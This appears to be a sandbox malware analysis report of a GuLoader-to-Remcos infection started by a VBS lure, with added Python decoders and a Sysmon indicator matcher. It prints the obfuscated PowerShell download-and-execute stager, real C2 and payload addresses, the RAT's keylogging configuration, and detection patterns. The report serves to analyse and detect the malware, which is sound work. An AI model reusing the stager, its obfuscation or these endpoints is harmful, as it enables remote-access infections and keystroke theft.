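    return "".join(blob[i] for i in range(start, len(blob) - 1, step))


# Matches `$Name=Gunflints '<blob>'` (whitespace around '=' optional).
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*Gunflints\s+'([^']*)'")


def decode_assignments(script: str) -> dict:
    """Decode every `$var = Gunflints '...'` assignment found in a script."""
    return {name: gunflints(blob) for name, blob in ASSIGN_RE.findall(script)}


# --- blobs copied from the report's PowerShell command line -------------------
UA_BLOB = (
    "SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosn"
    "Polyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansai"
    "BestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1"
    "Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1"
    " Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic "
)
HDR_BLOB = "Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf "
URL_BLOB = (
    "UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit."
    "Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget"
    " Ove,tr.isbaadshHashpibholie orkL kishn "
)
IEX_BLOB = " SnitfliforladeeMarlinexOverp i "

# The four plain assignments as they appear in the script; the calls wrapped in
# Skildrerne (...) are left out of this excerpt.
SCRIPT_EXCERPT = (
    "$Cryptoglaux=Gunflints '" + UA_BLOB + "';"
    "$spliff=Gunflints '" + HDR_BLOB + "';"
    "$Parolees=Gunflints '" + URL_BLOB + "';"
    "$Cumulates=Gunflints '" + IEX_BLOB + "';"
)


def decode_stage() -> dict:
    """Decode the excerpt; keys are the script's own variable names."""
    return decode_assignments(SCRIPT_EXCERPT)


if __name__ == "__main__":
    for name, value in decode_stage().items():
        print(f"${name:<12} = {value!r}")
```

The same regex applied to the whole command line will also pick up the blobs inside the Skildrerne (...) calls, which decode to the download, file-write and process-start statements; the three decoded values here are what the "Uses a known web browser user agent for HTTP communication" and "Yara detected Powershell download and execute" signatures are reacting to.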
Malware Configuration

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Extracted Remcos configuration:
{"Host:Port:Password": "103.237.87.159:9462:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-LO8JHK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara matches on dropped files and memory dumps (Source | Rule | Description | Author):
  C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  00000004.00000002.2236325736.0000000008060000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
  00000004.00000002.2236560886.0000000009F6C000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
  (memory-dump table truncated in this view; the full report lists 10 entries)
Yara matches on AMSI-captured script buffers (Source | Rule | Description | Author):
  amsi64_5352.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  amsi32_7372.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
    Matched strings (offset:identifier: string):
    • 0xed58:$b2: ::FromBase64String(
    • 0xdde1:$s1: -join
    • 0x1151c:$s3: Reverse
    • 0x758d:$s4: +=
    • 0x764f:$s4: +=
    • 0xb876:$s4: +=
    • 0xd993:$s4: +=
    • 0xdc7d:$s4: +=
    • 0xddc3:$s4: +=
    • 0x17547:$s4: +=
    • 0x175c7:$s4: +=
    • 0x1768d:$s4: +=
    • 0x1770d:$s4: +=
    • 0x178e3:$s4: +=
    • 0x17967:$s4: +=
    • 0xe5ff:$e4: Get-WmiObject
    • 0xe7ee:$e4: Get-Process
    • 0xe846:$e4: Start-Process
    • 0x181d5:$e4: Get-Process

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs", CommandLine|base64offset|contains: 8, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs", ProcessId: 5660, ProcessName: wscript.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7772, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw", ProcessId: 7936, ProcessName: wab.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs", CommandLine|base64offset|contains: 8, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs", ProcessId: 5660, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb 
vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig ');Skildrerne (Gunflints 'Konkurr$ V.ndib
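
The only string obfuscation in the command line above is the `Gunflints` routine: `$Sinologi` becomes 1 after the `${host}.CurrentCulture` check, and `Gunflints` then returns the character at index 7, 15, 23, ... of its argument, stopping before the final character, so every eighth character is payload and the rest is filler. `$Cumulates` decodes to `iex`, which makes `Skildrerne` a wrapper around `Invoke-Expression`, and `$spliff` decodes to `User-Agent`, matching the HTTP requests in the Networking section. The decoder below is an added example written for this report; it is not code from the sample or from Joe Sandbox. The three literals it decodes are copied from the command line as printed above; the page's copy of that command line is truncated and some of the longer literals appear to have lost characters in extraction, so only the short ones are used here.

```python
import re

# Added example: decoder for the "Gunflints" string obfuscation seen in the
# PowerShell command line in this report (not the sample's or Joe Sandbox's code).
#
# The PowerShell routine, reduced to its logic:
#   If (${host}.CurrentCulture) {$Sinologi++;}          # $Sinologi becomes 1
#   Function Gunflints($s){ $n = $s.Length - $Sinologi;
#     For($i = 7; $i -lt $n; $i += 8){ $out += $s.SubString($i, $Sinologi) }; $out }
# Every 8th character starting at index 7, up to (but excluding) the last
# character, is real; everything in between is filler.  The CurrentCulture
# test is always true in a real PowerShell host; in a host object that lacks
# it, $Sinologi stays 0 and every SubString call returns "", so the script
# silently decodes to nothing.


def gunflints(s: str, offset: int = 7, stride: int = 8, width: int = 1) -> str:
    """Recover the hidden string: s[offset], s[offset+stride], ... below len(s)-width.

    width mirrors $Sinologi (1 on a normal host)."""
    return "".join(s[i:i + width] for i in range(offset, len(s) - width, stride))


# Literals copied verbatim from the command line in the report.
SPLIFF = "Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf "
CUMULATES = " SnitfliforladeeMarlinexOverp i "
FURIBUND = "Enkelth>Se.opus "

# Matches  Gunflints '<literal>'  (single-quoted PowerShell string argument).
GUNFLINTS_CALL = re.compile(r"Gunflints\s+'([^']*)'")


def decode_literals(cmdline: str) -> list[str]:
    """Find every Gunflints '<literal>' call in a command line and decode it, in order."""
    return [gunflints(m.group(1)) for m in GUNFLINTS_CALL.finditer(cmdline)]


if __name__ == "__main__":
    # Constructed snippet in the shape of the report's command line.
    snippet = (f"$spliff=Gunflints '{SPLIFF}';$Furibund=Gunflints '{FURIBUND}';"
               f"$Cumulates=Gunflints '{CUMULATES}';")
    for decoded in decode_literals(snippet):
        print(repr(decoded))
```

Run against the full command line from a sandbox or an EDR process-creation event, `decode_literals` yields the staging script piece by piece (user agent, download URL, the `>` and `&&` used to build the `cmd /c` line); feeding the result back through the same function is not needed because only one layer is used here.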

                Stealing of Sensitive Information

                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 7772, TargetFilename: C:\ProgramData\remcos\logs.dat
                No Snort rule has matched



                AV Detection

                Source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.159:9462:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-LO8JHK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: Yara matchFile source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000004.00000002.2235317847.0000000007B60000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: tem.Core.pdb4 source: powershell.exe, 00000004.00000002.2235317847.0000000007B60000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_227910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_227910F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
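
The configuration extracted above gives the C2 endpoint (103.237.87.159:9462), the mutex (Rmc-LO8JHK) and the keylog file name (logs.dat), and the rest of this report shows each of them being used: wab.exe writes C:\ProgramData\remcos\logs.dat (Stealing of Sensitive Information) and opens TCP 103.237.87.159:9462 (Networking), and wscript.exe spawns powershell.exe (Software Vulnerabilities). As an added example, not part of the report or of any Joe Sandbox tooling, the Python below parses that extractor output into indicators and runs them over Sysmon-style events. The events are constructed here to mirror those three report lines (plus one benign wab.exe write) and are not taken from a real log; the field names follow Sysmon's EventID 1/3/11 schema.

```python
import ipaddress
import json

# Added example: turn the Remcos configuration printed in this report into
# indicators and match them against Sysmon-style events.  Not code from the
# report, the sample or Joe Sandbox.

# Subset of the report's "Malware Configuration Extractor" output, verbatim
# (raw string so the JSON escape for the backslash in HKCU\Run survives).
REMCOS_CONFIG_JSON = r'''{"Host:Port:Password": "103.237.87.159:9462:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Copy file": "remcos.exe", "Mutex": "Rmc-LO8JHK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat"}'''


def remcos_iocs(config_json: str) -> dict:
    """Reduce the extractor's config to the fields a detection needs."""
    cfg = json.loads(config_json)
    # rsplit from the right: the host part never contains ':' for an IPv4 C2.
    host, port, _password = cfg["Host:Port:Password"].rsplit(":", 2)
    return {
        "c2": (host, int(port)),
        "mutex": cfg["Mutex"],
        "keylog_file": cfg["Keylog file"],
        # "Setup HKCU\Run": "Enable"  ->  "HKCU\Run"
        "run_keys": [k.split(" ", 1)[1] for k, v in cfg.items()
                     if k.startswith("Setup HK") and v == "Enable"],
    }


# Constructed events modelled on lines of this report (not real log data).
EVENTS = [
    # Sysmon EventID 11 (FileCreate): the "File created" line, wab.exe PID 7772.
    {"EventID": 11, "Image": r"C:\Program Files (x86)\Windows Mail\wab.exe", "ProcessId": 7772,
     "TargetFilename": r"C:\ProgramData\remcos\logs.dat"},
    # Sysmon EventID 3 (NetworkConnect): the "global traffic" TCP line.
    {"EventID": 3, "Image": r"C:\Program Files (x86)\Windows Mail\wab.exe", "ProcessId": 7772,
     "DestinationIp": "103.237.87.159", "DestinationPort": 9462},
    # Sysmon EventID 1 (ProcessCreate): the wscript.exe -> powershell.exe child line.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    # Benign noise (constructed): wab.exe writing an unrelated file must not fire.
    {"EventID": 11, "Image": r"C:\Program Files (x86)\Windows Mail\wab.exe", "ProcessId": 4242,
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\export.tmp"},
]


def _basename_is(path: str, name: str) -> bool:
    return path.lower().endswith("\\" + name.lower())


def match_events(events: list[dict], iocs: dict) -> list[tuple]:
    """Return (rule, subject, detail) for every event that matches an indicator."""
    hits = []
    c2_ip, c2_port = iocs["c2"]
    for ev in events:
        eid = ev["EventID"]
        if eid == 11 and _basename_is(ev["TargetFilename"], iocs["keylog_file"]):
            hits.append(("remcos_keylog_file", ev["Image"], ev["TargetFilename"]))
        if eid == 3 and (ev["DestinationIp"], ev["DestinationPort"]) == (c2_ip, c2_port):
            hits.append(("remcos_c2_connect", ev["Image"], f"{c2_ip}:{c2_port}"))
        # Config-independent: the Windows address book has no business talking
        # to public IPs; this catches the injected host even if the C2 changes.
        if eid == 3 and _basename_is(ev["Image"], "wab.exe") \
                and ipaddress.ip_address(ev["DestinationIp"]).is_global:
            hits.append(("wab_outbound_public", ev["Image"], ev["DestinationIp"]))
        if eid == 1 and _basename_is(ev.get("ParentImage", ""), "wscript.exe") \
                and _basename_is(ev["Image"], "powershell.exe"):
            hits.append(("wscript_spawns_powershell", ev["ParentImage"], ev["Image"]))
    return hits


if __name__ == "__main__":
    iocs = remcos_iocs(REMCOS_CONFIG_JSON)
    print("IOCs:", iocs)
    for hit in match_events(EVENTS, iocs):
        print(*hit)
```

The keylog rule matches on the file name only because the config says "Keylog path: Application path", i.e. the directory depends on where the implant ends up; the sandbox saw C:\ProgramData\remcos\, another victim may not. The mutex and Run-key names are returned so a host sweep can check them, but they need handle or registry data that Sysmon EventID 1/3/11 do not carry.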

                Software Vulnerabilities

                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                Source: Malware configuration extractorURLs: 103.237.87.159
                Source: global trafficTCP traffic: 192.168.2.4:49739 -> 103.237.87.159:9462
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50
                Source: Joe Sandbox ViewIP Address: 103.237.86.247
                Source: Joe Sandbox ViewASN Name: BGNR-AP2BainandCompanySG
                Source: global trafficHTTP traffic detected: GET /Udmagret.hhk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /NtqoCaH77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247 (reported 50 times)
                Source: wab.exe, 00000009.00000002.3005282213.00000000220F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: wab.exe, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000D.00000003.2369245818.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369402203.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369461857.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login G equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000D.00000003.2369245818.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369402203.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369461857.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login G equals www.yahoo.com (Yahoo)
                Source: wab.exe, 0000000A.00000003.2329290801.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2329963298.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2330023743.0000000004ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login*t equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000A.00000003.2329290801.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2329963298.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2330023743.0000000004ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login*t equals www.yahoo.com (Yahoo)
